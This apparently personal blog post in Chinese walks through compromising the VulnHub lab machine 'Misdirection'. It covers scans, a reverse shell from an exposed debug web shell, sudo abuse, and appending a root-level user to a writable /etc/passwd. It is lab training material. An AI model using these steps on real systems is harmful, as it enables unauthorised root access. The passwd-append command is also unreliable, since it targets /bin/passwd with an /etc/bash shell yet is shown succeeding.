Misdirection，vulnhub靶机，不难，但开始阶段很容易被误导，渗透目标选择的优先级容易选错以致费时，死磕一点还是快速跳跃，需要权衡、经验和智慧。用webshell获得系统立足点，两次提权获得root权限。这台机器很标准，其中多了一点点曲折和趣味，是高仿真场景的抽象，规模不大，但渗透体验很棒，细节满满。

misdirection 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.139                                  
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:37 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00057s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.32 seconds

开放了 22，80，3306，8080 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80,3306,8080 192.1.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:38 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00024s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:bb:44:ee:f3:33:af:9f:a5:ce:b5:77:61:45:e4:36 (RSA)
|   256 67:7b:cb:4e:95:1b:78:08:8d:2a:b1:47:04:8d:62:87 (ECDSA)
|_  256 59:04:1d:25:11:6d:89:a3:6c:6d:e4:e3:d2:3c:da:7d (ED25519)
80/tcp   open  http    Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-title: Site doesn\'t have a title (text/html; charset=utf-8).
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:0C:29:20:A6:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

Linux 操作系统，80 端口使用 python 搭建了个 Rocket 服务，8080 端口是默认的 Apache 界面

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:40 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00025s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

UDP 扫描结果并没有特别有价值

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306,8080 192.1.1.139                       
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-21 22:38 EDT
Nmap scan report for 192.1.1.139
Host is up (0.00024s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Felections%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Ffeatures%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|     http://192.1.1.139:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|_    http://192.1.1.139:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/admin/: Possible admin folder
|   /admin/backup/: Possible backup
|   /admin/download/backup.sql: Possible database backup
|   /examples/: Sample scripts
|   /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
|   /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/FCKeditor File upload
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
|   /admin/jscript/upload.php: Lizard Cart/Remote File upload
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload
|   /admin/jscript/upload.pl: Lizard Cart/Remote File upload
|_  /admin/jscript/upload.asp: Lizard Cart/Remote File upload
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.139
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.1.1.139:80/init/default/user/login?_next=/init/default/index
|     Form id: auth_user_email__row
|     Form action: #
|     
|     Path: http://192.1.1.139:80/init/default/elections
|     Form id: auth_user_email__row
|     Form action: #
|     
|     Path: http://192.1.1.139:80/init/default/user/request_reset_password?_next=/init/default/index
|     Form id: auth_user_email__row
|_    Form action: #
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /debug/: Potentially interesting folder
|   /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
MAC Address: 00:0C:29:20:A6:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1098.22 seconds

漏洞扫描的结果比较长，先进入了 Web 界面查看环节

Web 服务查看

80 端口似乎是一个在线投票平台，有登录界面

登录界面给出了搭建网站所使用的框架

尝试搜索 web2py

的确发现了一个漏洞列表，提到了其中包含本地文件包含、XSS 和 CSRF。仔细看发现需要知道使用的组件名称 [applicationmame]，这就遇到了困难了，接着看看别的攻击面吧。

渗透优先级

这时候，根据 vuln 脚本的扫描结果，发现 8080 端口下有很多目录，试一试目录爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.139:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 
[sudo] password for kali: 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.139:8080/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/22 10:33:46 Starting gobuster in directory enumeration mode
===============================================================
/images   (Status: 301) [Size: 318] [--> http://192.1.1.139:8080/images/]                                                   
/scripts  (Status: 301) [Size: 319] [--> http://192.1.1.139:8080/scripts/]                                                  
/css      (Status: 301) [Size: 315] [--> http://192.1.1.139:8080/css/]     

/wordpress (Status: 301) [Size: 321] [--> http://192.1.1.139:8080/wordpress/]                                                
/development          (Status: 301) [Size: 323] [--> http://192.1.1.139:8080/development/]                                              
/manual               (Status: 301) [Size: 318] [--> http://192.1.1.139:8080/manual/]                                                   
/js                   (Status: 301) [Size: 314] [--> http://192.1.1.139:8080/js/]                                                       
/shell                (Status: 301) [Size: 317] [--> http://192.1.1.139:8080/shell/]                                                    
/debug                (Status: 301) [Size: 317] [--> http://192.1.1.139:8080/debug/]                                                    
/help                 (Status: 301) [Size: 316] [--> http://192.1.1.139:8080/help/]                                                     
/server-status        (Status: 403) [Size: 278]
Progress: 218960 / 220561 (99.27%)
===============================================================
2023/06/22 10:34:06 Finished
===============================================================

依次查看上述目录，发现 debug 是最直接的攻击面，而 wordpress 一开始被我放在了首位，尝试了很多方法都没有拿到 shell。这台靶机对我来说最大的意义在于一定要时刻权衡攻击路径的优先级。优先级的选取上，要么选取试错成本小的，要么选择熟悉的攻击面，并且要对总体攻击面有一定的了解。

debug 目录

是一个可以直接交互的 shell，分别尝试 bash 和 python 反弹 shell

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443                                                           
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.139] 53380
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@misdirection:/tmp$ whoami
whoami
www-data

提权

提权到brexit

基础的信息收集

www-data@misdirection:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on localhost:
    (brexit) NOPASSWD: /bin/bash
www-data@misdirection:/tmp$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
brexit@misdirection:/tmp$ whoami
whoami
brexit

sudo -l 有意外惊喜，sudo -u 的语法是现查的，感谢 chatgpt，

brexit@misdirection:/tmp$ id
id
uid=1000(brexit) gid=1000(brexit) groups=1000(brexit),24(cdrom),30(dip),46(plugdev),108(lxd)
brexit@misdirection:/tmp$ sudo -l
sudo -l
[sudo] password for brexit: 

Sorry, try again.
[sudo] password for brexit: 

Sorry, try again.
[sudo] password for brexit: 

sudo: 3 incorrect password attempts
brexit@misdirection:/tmp$ cd ~
cd ~
brexit@misdirection:~$ ls
ls
start-vote.sh  user.txt  web2py
brexit@misdirection:~$ pwd
pwd
/home/brexit
brexit@misdirection:~$ cat user.txt
cat user.txt
404b9193154be7fbbc56d7534cb26339

viminfo 敏感文件

看看家目录

brexit@misdirection:~$ ls -liah
ls -liah
total 60K
402287 drwxr-xr-x  6 brexit brexit 4.0K Jun  1  2019 .
393218 drwxr-xr-x  3 root   root   4.0K Jun  1  2019 ..
403447 -rw-------  1 brexit brexit    0 Jun  1  2019 .bash_history
402289 -rw-r--r--  1 brexit brexit  220 Apr  4  2018 .bash_logout
402290 -rw-r--r--  1 brexit brexit 3.7K Apr  4  2018 .bashrc
402295 drwx------  3 brexit brexit 4.0K Jun  1  2019 .cache
402297 drwx------  3 brexit brexit 4.0K Jun  1  2019 .gnupg
402259 drwxrwxr-x  3 brexit brexit 4.0K Jun  1  2019 .local
402288 -rw-r--r--  1 brexit brexit  807 Apr  4  2018 .profile
402215 -rw-rw-r--  1 brexit brexit   66 Jun  1  2019 .selected_editor
393356 -rw-------  1 brexit brexit 9.2K Jun  1  2019 .viminfo
402285 -rwxrwxr-x  1 brexit brexit   90 Jun  1  2019 start-vote.sh
393358 -r--r-----  1 brexit brexit   33 Jun  1  2019 user.txt
402661 drwxrwxr-x 16 brexit brexit 4.0K Jun 20 12:45 web2py

家目录下有个敏感文件 viminfo。一开始我忽略了这个文件，导致后续提权操作很艰难而且没有成功。我尝试了使用 pkexec 提权和查找敏感的密码文件，虽然成功登录了 mysql，但那个密码也仅局限于登录 mysql，数据库中读取到的包含用户的密码是经过 md5 加密的。在线的破解没有效果。这次也是对自己的一个提醒，要了解常见的提权手法，红队笔记的提权视频要纳入日程当中。

brexit@misdirection:~$ cat .viminfo
cat .viminfo
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=latin1


# hlsearch on (H) or off (h):
~h
# Last Search Pattern:
~MSle0~/any

# Command Line History (newest to oldest):
:q!
|2,0,1559373596,,"q!"
:set paste
|2,0,1559353917,,"set paste"

# Search String History (newest to oldest):
?/any
|2,1,1559354744,47,"any"
?/anyserver
|2,1,1559354723,47,"anyserver"
?/port
|2,1,1559354713,47,"port"
?/127
|2,1,1559354712,47,"127"

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /etc/passwd
|4,48,1,0,1559373596,"/etc/passwd"
'1  1  0  ~/web2py/parameters_8000.py
|4,49,1,0,1559355323,"~/web2py/parameters_8000.py"
'2  1  0  ~/web2py/parameters_8000.py
|4,50,1,0,1559355267,"~/web2py/parameters_8000.py"
'3  318  9  ~/web2py/anyserver.py
|4,51,318,9,1559354953,"~/web2py/anyserver.py"

viminfo 文件中暴露了一个非常重要的事情，似乎这个用户对 passwd 有过操作，接下来查看一下 passwd 文件的信息

brexit@misdirection:~$ ls -liah /etc/passwd
ls -liah /etc/passwd
153253 -rwxrwxr-- 1 root brexit 1.6K Jun  1  2019 /etc/passwd
brexit@misdirection:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false

passwd 文件写入

原来这个用户可以操作 passwd 文件，那就搜一下如何向 passwd 文件中添加用户

brexit@misdirection:~$ echo 'hack:zSZ7Whrr8hgwY:0:0::/root/:/etc/bash' >>/bin/passwd

brexit@misdirection:~$ su hack
su hack
Password: 123456
root@misdirection:/home/brexit# id
id
uid=0(root) gid=0(root) groups=0(root)
root@misdirection:/home/brexit# cd /root
cd /root
root@misdirection:/root# cat root.txt 
cat root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
root@misdirection:/root# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:20:a6:ad brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.139/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1045sec preferred_lft 1045sec
    inet6 fe80::20c:29ff:fe20:a6ad/64 scope link 
       valid_lft forever preferred_lft forever
root@misdirection:/root# uname -a
uname -a
Linux misdirection 4.15.0-212-generic #223-Ubuntu SMP Tue May 23 13:09:22 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

红队笔记视频中的操作更舒服一些，顺便记录一下他的手法。首先使用 openssl 来生成哈希值

1
2
3

brexit@misdirection:~$ openssl passwd -1 123456
openssl passwd -1 123456
$1$FE.gLBgw$N3gdTUY9k04o7TtwcU/HS/

然后查看 passwd 中 root 用户的格式内容，将用户和 x 替换为自己的就行

1
2
3

brexit@misdirection:~$ cat /etc/passwd | grep root
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash

knowledge_database > vulnhub

misdirection

https://i3eg1nner.github.io/2023/06/efe95bcd539b.html

作者

I3eg1nner

发布于

2023年6月22日

许可协议

me and my girlfriend 上一篇

Topology靶机下一篇